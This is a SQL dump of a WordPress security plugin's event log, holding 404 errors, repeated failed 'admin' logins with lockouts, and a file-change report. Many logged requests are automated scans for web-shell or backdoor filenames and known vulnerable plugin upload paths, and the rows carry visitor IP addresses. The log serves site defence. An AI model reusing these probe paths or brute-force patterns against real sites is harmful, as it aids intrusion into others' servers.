(85417, 'four_oh_four', '404 Error', 3, '2018-04-23 06:13:58', '2018-04-23 11:13:58', '100.43.85.173', '', 0, '/menlightenment/fSjZf/MfgXK/ZKUOT/VTVTX/PalSa/oUfSj/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85418, 'four_oh_four', '404 Error', 3, '2018-04-23 06:14:26', '2018-04-23 11:14:26', '130.105.239.239', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85419, 'four_oh_four', '404 Error', 3, '2018-04-23 06:31:31', '2018-04-23 11:31:31', '193.106.30.99', '', 0, '/wp-content/themes/hello.php', '', 'a:1:{s:12:"query_string";s:4:"id=1";}'),
(85420, 'four_oh_four', '404 Error', 3, '2018-04-23 06:42:46', '2018-04-23 11:42:46', '142.252.250.90', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85421, 'four_oh_four', '404 Error', 3, '2018-04-23 06:42:47', '2018-04-23 11:42:47', '142.252.250.90', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85422, 'four_oh_four', '404 Error', 3, '2018-04-23 07:14:14', '2018-04-23 12:14:14', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85423, 'four_oh_four', '404 Error', 3, '2018-04-23 07:32:03', '2018-04-23 12:32:03', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85424, 'four_oh_four', '404 Error', 3, '2018-04-23 07:32:56', '2018-04-23 12:32:56', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85425, 'four_oh_four', '404 Error', 3, '2018-04-23 07:34:24', '2018-04-23 12:34:24', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85426, 'four_oh_four', '404 Error', 3, '2018-04-23 07:47:34', '2018-04-23 12:47:34', '95.211.146.167', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85427, 'four_oh_four', '404 Error', 3, '2018-04-23 07:47:35', '2018-04-23 12:47:35', '95.211.146.167', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85428, 'four_oh_four', '404 Error', 3, '2018-04-23 08:28:32', '2018-04-23 13:28:32', '178.148.14.38', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85429, 'four_oh_four', '404 Error', 3, '2018-04-23 08:32:37', '2018-04-23 13:32:37', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85430, 'four_oh_four', '404 Error', 3, '2018-04-23 08:38:49', '2018-04-23 13:38:49', '97.82.236.58', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:0:"";}'),
(85431, 'four_oh_four', '404 Error', 3, '2018-04-23 08:39:34', '2018-04-23 13:39:34', '97.82.236.58', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/ebook/', 'a:1:{s:12:"query_string";s:0:"";}'),
(85432, 'four_oh_four', '404 Error', 3, '2018-04-23 09:27:00', '2018-04-23 14:27:00', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85433, 'four_oh_four', '404 Error', 3, '2018-04-23 09:46:05', '2018-04-23 14:46:05', '193.106.30.99', '', 0, '/wp-includes/css/info.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85434, 'four_oh_four', '404 Error', 3, '2018-04-23 09:46:41', '2018-04-23 14:46:41', '45.121.189.222', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85435, 'four_oh_four', '404 Error', 3, '2018-04-23 10:03:47', '2018-04-23 15:03:47', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85436, 'four_oh_four', '404 Error', 3, '2018-04-23 10:04:06', '2018-04-23 15:04:06', '191.101.107.140', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85437, 'four_oh_four', '404 Error', 3, '2018-04-23 10:04:07', '2018-04-23 15:04:07', '191.101.107.140', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85438, 'four_oh_four', '404 Error', 3, '2018-04-23 10:39:22', '2018-04-23 15:39:22', '14.226.234.104', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85439, 'four_oh_four', '404 Error', 3, '2018-04-23 10:39:24', '2018-04-23 15:39:24', '14.226.234.104', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85440, 'four_oh_four', '404 Error', 3, '2018-04-23 10:50:10', '2018-04-23 15:50:10', '171.247.251.1', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85441, 'four_oh_four', '404 Error', 3, '2018-04-23 10:50:11', '2018-04-23 15:50:11', '171.247.251.1', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85442, 'four_oh_four', '404 Error', 3, '2018-04-23 11:12:39', '2018-04-23 16:12:39', '66.249.69.99', '', 0, '/ads.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85443, 'four_oh_four', '404 Error', 3, '2018-04-23 11:38:12', '2018-04-23 16:38:12', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85444, 'four_oh_four', '404 Error', 3, '2018-04-23 12:27:11', '2018-04-23 17:27:11', '188.146.97.35', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85445, 'four_oh_four', '404 Error', 3, '2018-04-23 12:35:30', '2018-04-23 17:35:30', '172.245.73.12', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85446, 'four_oh_four', '404 Error', 3, '2018-04-23 12:35:31', '2018-04-23 17:35:31', '172.245.73.12', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85447, 'four_oh_four', '404 Error', 3, '2018-04-23 12:55:28', '2018-04-23 17:55:28', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85448, 'four_oh_four', '404 Error', 3, '2018-04-23 12:55:29', '2018-04-23 17:55:29', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85449, 'four_oh_four', '404 Error', 3, '2018-04-23 12:55:32', '2018-04-23 17:55:32', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85450, 'four_oh_four', '404 Error', 3, '2018-04-23 12:55:32', '2018-04-23 17:55:32', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85451, 'four_oh_four', '404 Error', 3, '2018-04-23 12:59:33', '2018-04-23 17:59:33', '193.106.30.99', '', 0, '/wp-includes/SimplePie/Decode/HTML/bug.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85452, 'four_oh_four', '404 Error', 3, '2018-04-23 14:51:40', '2018-04-23 19:51:40', '91.200.12.193', '', 0, '/global-belief-relief/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx', 'http://globalbeliefrelief.com/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx', 'a:1:{s:12:"query_string";s:0:"";}'),
(85453, 'four_oh_four', '404 Error', 3, '2018-04-23 15:56:49', '2018-04-23 20:56:49', '91.200.12.193', '', 0, '/global-belief-relief/wp-content/plugins/sexy-contact-form/includes/fileupload/', 'http://globalbeliefrelief.com/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(85454, 'four_oh_four', '404 Error', 3, '2018-04-23 16:13:29', '2018-04-23 21:13:29', '41.189.50.199', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85455, 'four_oh_four', '404 Error', 3, '2018-04-23 16:16:05', '2018-04-23 21:16:05', '69.130.75.158', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85457, 'four_oh_four', '404 Error', 3, '2018-04-23 16:39:46', '2018-04-23 21:39:46', '185.93.2.74', '', 0, '/wp-content/plugins/wp-symposium/server/php/OTyWfVmqFZeGwc.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85458, 'file_change', 'File Changes Detected', 8, '2018-04-23 16:41:27', '2018-04-23 21:41:27', '', '', 0, '', '', 'a:4:{s:5:"added";a:0:{}s:7:"removed";a:1:{s:107:"wp-content/plugins/ready-ecommerce/modules/cache/timthumb_int_da3dd9c2c453b9ea3d036598abfb8e7d.timthumb.txt";a:2:{s:1:"d";s:10:"1524258914";s:1:"h";s:32:"3143ce3085b9cdcd92bd4c8754ec4daa";}}s:7:"changed";a:2:{s:59:"wp-content/plugins/ready-ecommerce/modules/cache/index.html";a:2:{s:1:"h";s:32:"d41d8cd98f00b204e9800998ecf8427e";s:1:"d";s:10:"1524515221";}s:82:"wp-content/plugins/ready-ecommerce/modules/cache/timthumb_cacheLastCleanTime.touch";a:2:{s:1:"h";s:32:"d41d8cd98f00b204e9800998ecf8427e";s:1:"d";s:10:"1524515221";}}s:6:"memory";s:5:"39.41";}'),
(85459, 'four_oh_four', '404 Error', 3, '2018-04-23 16:53:06', '2018-04-23 21:53:06', '180.76.15.151', '', 0, '/wp-includes/js/mediaelement/\\\\\\\\\\\\\\''+a.url+\\\\\\\\\\\\\\''', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85460, 'four_oh_four', '404 Error', 3, '2018-04-23 17:03:39', '2018-04-23 22:03:39', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85461, 'four_oh_four', '404 Error', 3, '2018-04-23 17:03:41', '2018-04-23 22:03:41', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85462, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 17:07:46', '2018-04-23 22:07:46', '185.220.100.255', 'admin', 0, '', '', 'a:0:{}'),
(85463, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 17:07:46', '2018-04-23 22:07:46', '185.220.100.255', 'admin', 0, '', '', 'a:0:{}'),
(85464, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 17:07:46', '2018-04-23 22:07:46', '185.220.100.255', 'admin', 0, '', '', 'a:0:{}'),
(85465, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 17:07:46', '2018-04-23 22:07:46', '185.220.100.255', 'admin', 0, '', '', 'a:0:{}'),
(85466, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 17:07:46', '2018-04-23 22:07:46', '185.220.100.255', 'admin', 0, '', '', 'a:0:{}'),
(85467, 'lockout', 'Host or User Lockout', 10, '2018-04-23 17:07:46', '2018-04-23 22:07:46', '185.220.100.255', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-23 17:22:46";s:11:"expires_gmt";s:19:"2018-04-23 22:22:46";s:4:"type";s:11:"brute_force";}'),
(85468, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 17:10:31', '2018-04-23 22:10:31', '94.230.208.147', 'admin', 0, '', '', 'a:0:{}'),
(85469, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 17:10:31', '2018-04-23 22:10:31', '94.230.208.147', 'admin', 0, '', '', 'a:0:{}'),
(85470, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 17:10:31', '2018-04-23 22:10:31', '94.230.208.147', 'admin', 0, '', '', 'a:0:{}'),
(85471, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 17:10:31', '2018-04-23 22:10:31', '94.230.208.147', 'admin', 0, '', '', 'a:0:{}'),
(85472, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 17:10:31', '2018-04-23 22:10:31', '94.230.208.147', 'admin', 0, '', '', 'a:0:{}'),
(85473, 'lockout', 'Host or User Lockout', 10, '2018-04-23 17:10:31', '2018-04-23 22:10:31', '94.230.208.147', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-23 17:25:31";s:11:"expires_gmt";s:19:"2018-04-23 22:25:31";s:4:"type";s:11:"brute_force";}'),
(85474, 'four_oh_four', '404 Error', 3, '2018-04-23 17:27:47', '2018-04-23 22:27:47', '206.166.0.68', '', 0, '/&source=gmail&ust=1518711721283000&usg=AFQjCNFq7SH2cKrIg45kXdTCq11jtEYcAQ', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85475, 'four_oh_four', '404 Error', 3, '2018-04-23 18:03:01', '2018-04-23 23:03:01', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85476, 'four_oh_four', '404 Error', 3, '2018-04-23 18:03:02', '2018-04-23 23:03:02', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85477, 'four_oh_four', '404 Error', 3, '2018-04-23 18:03:05', '2018-04-23 23:03:05', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85478, 'four_oh_four', '404 Error', 3, '2018-04-23 18:03:06', '2018-04-23 23:03:06', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85479, 'four_oh_four', '404 Error', 3, '2018-04-23 18:20:52', '2018-04-23 23:20:52', '38.145.96.17', '', 0, '/thisErrorPageShouldReturn404', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85480, 'four_oh_four', '404 Error', 3, '2018-04-23 18:20:54', '2018-04-23 23:20:54', '38.21.49.55', '', 0, '/thisErrorPageShouldReturn404', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85481, 'four_oh_four', '404 Error', 3, '2018-04-23 18:21:01', '2018-04-23 23:21:01', '38.21.49.239', '', 0, '/thisErrorPageShouldReturn404', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85482, 'four_oh_four', '404 Error', 3, '2018-04-23 18:21:04', '2018-04-23 23:21:04', '38.145.96.62', '', 0, '/thisErrorPageShouldReturn404', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85483, 'four_oh_four', '404 Error', 3, '2018-04-23 18:21:08', '2018-04-23 23:21:08', '38.145.123.132', '', 0, '/sitemap.xml', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85484, 'four_oh_four', '404 Error', 3, '2018-04-23 18:21:09', '2018-04-23 23:21:09', '38.145.99.62', '', 0, '/sitemap.xml.gz', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85485, 'four_oh_four', '404 Error', 3, '2018-04-23 18:21:10', '2018-04-23 23:21:10', '38.21.49.55', '', 0, '/sitemap_index.xml', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85486, 'four_oh_four', '404 Error', 3, '2018-04-23 18:21:11', '2018-04-23 23:21:11', '38.145.96.130', '', 0, '/sitemap_index.xml.gz', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85487, 'four_oh_four', '404 Error', 3, '2018-04-23 18:36:25', '2018-04-23 23:36:25', '142.252.248.250', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85488, 'four_oh_four', '404 Error', 3, '2018-04-23 18:36:26', '2018-04-23 23:36:26', '142.252.248.250', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85489, 'four_oh_four', '404 Error', 3, '2018-04-23 18:55:29', '2018-04-23 23:55:29', '193.106.30.99', '', 0, '/wp-profi1e.php', '', 'a:1:{s:12:"query_string";s:3:"x=1";}'),
(85490, 'four_oh_four', '404 Error', 3, '2018-04-23 19:35:53', '2018-04-24 00:35:53', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85491, 'four_oh_four', '404 Error', 3, '2018-04-23 19:35:54', '2018-04-24 00:35:54', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85492, 'four_oh_four', '404 Error', 3, '2018-04-23 19:35:56', '2018-04-24 00:35:56', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85493, 'four_oh_four', '404 Error', 3, '2018-04-23 19:35:57', '2018-04-24 00:35:57', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85494, 'four_oh_four', '404 Error', 3, '2018-04-23 20:16:43', '2018-04-24 01:16:43', '179.222.186.185', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85495, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 21:15:38', '2018-04-24 02:15:38', '46.165.254.166', 'admin', 0, '', '', 'a:0:{}'),
(85496, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 21:15:38', '2018-04-24 02:15:38', '46.165.254.166', 'admin', 0, '', '', 'a:0:{}'),
(85497, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 21:15:38', '2018-04-24 02:15:38', '46.165.254.166', 'admin', 0, '', '', 'a:0:{}'),
(85498, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 21:15:38', '2018-04-24 02:15:38', '46.165.254.166', 'admin', 0, '', '', 'a:0:{}'),
(85499, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 21:15:38', '2018-04-24 02:15:38', '46.165.254.166', 'admin', 0, '', '', 'a:0:{}'),
(85500, 'lockout', 'Host or User Lockout', 10, '2018-04-23 21:15:38', '2018-04-24 02:15:38', '46.165.254.166', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-23 21:30:38";s:11:"expires_gmt";s:19:"2018-04-24 02:30:38";s:4:"type";s:11:"brute_force";}'),
(85501, 'four_oh_four', '404 Error', 3, '2018-04-23 21:53:22', '2018-04-24 02:53:22', '186.57.1.117', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85502, 'four_oh_four', '404 Error', 3, '2018-04-23 22:14:05', '2018-04-24 03:14:05', '193.106.30.99', '', 0, '/global-belief-relief/wp-main.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85503, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 22:45:40', '2018-04-24 03:45:40', '167.99.134.21', 'admin', 0, '', '', 'a:0:{}'),
(85504, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 22:45:40', '2018-04-24 03:45:40', '167.99.134.21', 'admin', 0, '', '', 'a:0:{}'),
(85505, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 22:45:40', '2018-04-24 03:45:40', '167.99.134.21', 'admin', 0, '', '', 'a:0:{}'),
(85506, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 22:45:40', '2018-04-24 03:45:40', '167.99.134.21', 'admin', 0, '', '', 'a:0:{}'),
(85507, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 22:45:40', '2018-04-24 03:45:40', '167.99.134.21', 'admin', 0, '', '', 'a:0:{}'),
(85508, 'lockout', 'Host or User Lockout', 10, '2018-04-23 22:45:40', '2018-04-24 03:45:40', '167.99.134.21', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-23 23:00:40";s:11:"expires_gmt";s:19:"2018-04-24 04:00:40";s:4:"type";s:11:"brute_force";}'),
(85509, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 22:54:12', '2018-04-24 03:54:12', '195.201.115.213', 'admin', 0, '', '', 'a:0:{}'),
(85510, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 22:54:12', '2018-04-24 03:54:12', '195.201.115.213', 'admin', 0, '', '', 'a:0:{}'),
(85511, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 22:54:12', '2018-04-24 03:54:12', '195.201.115.213', 'admin', 0, '', '', 'a:0:{}'),
(85512, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 22:54:12', '2018-04-24 03:54:12', '195.201.115.213', 'admin', 0, '', '', 'a:0:{}'),
(85513, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-23 22:54:12', '2018-04-24 03:54:12', '195.201.115.213', 'admin', 0, '', '', 'a:0:{}'),
(85514, 'lockout', 'Host or User Lockout', 10, '2018-04-23 22:54:12', '2018-04-24 03:54:12', '195.201.115.213', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-23 23:09:12";s:11:"expires_gmt";s:19:"2018-04-24 04:09:12";s:4:"type";s:11:"brute_force";}'),
(85515, 'four_oh_four', '404 Error', 3, '2018-04-23 22:56:53', '2018-04-24 03:56:53', '73.188.254.127', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85516, 'four_oh_four', '404 Error', 3, '2018-04-23 23:09:37', '2018-04-24 04:09:37', '193.106.30.99', '', 0, '/wp-main.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85517, 'four_oh_four', '404 Error', 3, '2018-04-23 23:13:13', '2018-04-24 04:13:13', '49.248.200.24', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85518, 'four_oh_four', '404 Error', 3, '2018-04-23 23:26:47', '2018-04-24 04:26:47', '78.124.35.160', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85519, 'four_oh_four', '404 Error', 3, '2018-04-24 01:08:34', '2018-04-24 06:08:34', '46.246.1.248', '', 0, '/wp-content/uploads/assignments/ch.php.', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85520, 'four_oh_four', '404 Error', 3, '2018-04-24 01:48:10', '2018-04-24 06:48:10', '207.46.13.7', '', 0, '/liongoodman-com/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85521, 'four_oh_four', '404 Error', 3, '2018-04-24 01:50:19', '2018-04-24 06:50:19', '184.175.251.8', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85522, 'four_oh_four', '404 Error', 3, '2018-04-24 01:50:20', '2018-04-24 06:50:20', '184.175.251.8', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85523, 'four_oh_four', '404 Error', 3, '2018-04-24 01:56:48', '2018-04-24 06:56:48', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85524, 'four_oh_four', '404 Error', 3, '2018-04-24 02:24:04', '2018-04-24 07:24:04', '165.231.24.7', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85525, 'four_oh_four', '404 Error', 3, '2018-04-24 02:24:05', '2018-04-24 07:24:05', '165.231.24.7', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85526, 'four_oh_four', '404 Error', 3, '2018-04-24 02:32:46', '2018-04-24 07:32:46', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85527, 'four_oh_four', '404 Error', 3, '2018-04-24 02:37:59', '2018-04-24 07:37:59', '178.238.236.51', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85528, 'four_oh_four', '404 Error', 3, '2018-04-24 02:38:00', '2018-04-24 07:38:00', '178.238.236.51', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85529, 'four_oh_four', '404 Error', 3, '2018-04-24 02:38:55', '2018-04-24 07:38:55', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85530, 'four_oh_four', '404 Error', 3, '2018-04-24 02:42:30', '2018-04-24 07:42:30', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85531, 'four_oh_four', '404 Error', 3, '2018-04-24 02:53:03', '2018-04-24 07:53:03', '193.106.30.99', '', 0, '/wp-tmp.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85532, 'four_oh_four', '404 Error', 3, '2018-04-24 03:07:54', '2018-04-24 08:07:54', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85533, 'four_oh_four', '404 Error', 3, '2018-04-24 03:07:56', '2018-04-24 08:07:56', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85534, 'four_oh_four', '404 Error', 3, '2018-04-24 03:08:43', '2018-04-24 08:08:43', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85535, 'four_oh_four', '404 Error', 3, '2018-04-24 03:27:23', '2018-04-24 08:27:23', '178.205.96.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85536, 'four_oh_four', '404 Error', 3, '2018-04-24 03:30:09', '2018-04-24 08:30:09', '62.210.37.82', '', 0, '/global-belief-relief/ZaMXZ/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85537, 'four_oh_four', '404 Error', 3, '2018-04-24 03:38:21', '2018-04-24 08:38:21', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85538, 'four_oh_four', '404 Error', 3, '2018-04-24 03:38:21', '2018-04-24 08:38:21', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85539, 'four_oh_four', '404 Error', 3, '2018-04-24 03:38:43', '2018-04-24 08:38:43', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85540, 'four_oh_four', '404 Error', 3, '2018-04-24 03:56:44', '2018-04-24 08:56:44', '169.57.0.246', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85541, 'four_oh_four', '404 Error', 3, '2018-04-24 03:56:56', '2018-04-24 08:56:56', '169.57.0.246', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85542, 'four_oh_four', '404 Error', 3, '2018-04-24 03:57:08', '2018-04-24 08:57:08', '169.57.0.246', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85543, 'four_oh_four', '404 Error', 3, '2018-04-24 03:57:11', '2018-04-24 08:57:11', '169.57.0.246', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85544, 'four_oh_four', '404 Error', 3, '2018-04-24 04:03:31', '2018-04-24 09:03:31', '62.11.43.202', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85545, 'four_oh_four', '404 Error', 3, '2018-04-24 04:05:15', '2018-04-24 09:05:15', '176.240.165.49', '', 0, '/administrator/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85546, 'four_oh_four', '404 Error', 3, '2018-04-24 04:06:13', '2018-04-24 09:06:13', '176.240.165.49', '', 0, '/bitrix/admin/', '', 'a:1:{s:12:"query_string";s:7:"lang=en";}'),
(85547, 'four_oh_four', '404 Error', 3, '2018-04-24 04:06:35', '2018-04-24 09:06:35', '176.240.165.49', '', 0, '/admin/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85548, 'four_oh_four', '404 Error', 3, '2018-04-24 04:19:16', '2018-04-24 09:19:16', '83.34.228.178', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85549, 'four_oh_four', '404 Error', 3, '2018-04-24 04:44:59', '2018-04-24 09:44:59', '167.114.43.90', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85550, 'four_oh_four', '404 Error', 3, '2018-04-24 04:45:00', '2018-04-24 09:45:00', '167.114.43.90', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85551, 'four_oh_four', '404 Error', 3, '2018-04-24 06:17:49', '2018-04-24 11:17:49', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85552, 'four_oh_four', '404 Error', 3, '2018-04-24 06:17:49', '2018-04-24 11:17:49', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
